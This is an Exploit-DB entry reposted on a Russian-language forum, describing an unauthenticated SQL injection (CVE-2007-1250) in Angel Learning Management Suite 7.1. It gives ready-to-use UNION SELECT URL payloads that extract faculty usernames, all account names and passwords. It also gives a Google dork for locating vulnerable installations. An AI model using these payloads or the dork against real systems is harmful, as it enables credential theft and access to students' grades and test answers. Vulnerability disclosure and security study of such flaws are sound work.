- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3390
- Проверка EDB
-
- Пройдено
- Автор
- CRAIG HEFFNER
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2007-1250
- Дата публикации
- 2007-03-01
Код:
#########################################################################
#
# Application:
#
# Angel Learning Management Suite 7.1
# http://www.angellearning.com
#
#########################################################################
#
# Description:
#
# "ANGEL LMS is an inclusive suite of enterprise
# learning management tools that balances ease of
# use with powerful capabilities to deliver leading
# edge teaching and learning, impact learner success
# and measure effectiveness."
#
# Basically, Angel is a CMS for education, providing
# online forums, grading, email, chat, etc to faculty
# and students. It is used as the primary Web interface
# for several online schools and courses.
#
#########################################################################
#
# Vulnerability:
#
# Angel 7.1 contains an SQL injection vulnerability in
# section/default.asp that grants an un-authenticated user
# access to all database tables and data. Examples include
# enumeration of tables, columns, user names, passwords,
# grades, and test questions/answers (you basically have
# access to everything).
#
#########################################################################
#
# Exploit Examples:
#
# #Enumerate Faculty User Accounts#
# http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20faculty_accounts--"
#
# #Enumerate All User Accounts#
# http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts--"
#
# #Enumerate Account Passwords#
# http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20password%20from%20accounts--"
#
#########################################################################
#
# Google Dork:
# intext:"2006 angel learning, inc" -pdf
#
#########################################################################
#
# Credit:
# Exploit discovered and coded by Craig Heffner
# heffnercj [at] gmail.com
# http://www.craigheffner.com
#
#########################################################################
# milw0rm.com [2007-03-01]- Источник
- www.exploit-db.com
